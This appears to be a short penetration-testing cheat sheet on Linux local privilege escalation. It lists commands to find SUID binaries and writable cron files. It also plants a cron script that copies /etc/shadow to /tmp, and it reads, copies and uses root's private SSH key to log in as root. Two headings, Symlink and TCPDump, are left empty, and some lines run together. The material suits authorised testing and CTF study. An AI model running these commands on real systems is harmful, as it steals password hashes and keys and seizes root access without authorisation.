Local Privilege Escalation
SUID
find / -perm -4000 2>/dev/null Exploitation depends on functionality of SUID. Reading files or writing files leads to grabbing SSH / shadow files.
Cron
# Find bad privs
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;
# Look at when it will run and who as
cat /etc/crontab
# Get it to write to shadow file
echo -e '#!/bin/bash\n/bin/cat /etc/shadow > /tmp/shadow' > /etc/cron.hourly/oddjobReadable SSH
# Check listing root
ls -la /root
# Check listing ssh
ls -la /root/.ssh
# Read file (worth trying even if you cant list contents of .ssh
cat /root/.ssh/id_rsa
# Make SSH dir
mkdir /home/<user>/.ssh
# Copy SSH into it
cp /root/.ssh/id_rsa /home/<user>/.ssh
# Change Perms
chmod o-rwx /home/<user>/.ssh/id_rsa
# SSH
ssh -i /home/<user>/.ssh/id_rsa root@localhostSymlink
TCPDump
Last updated
Was this helpful?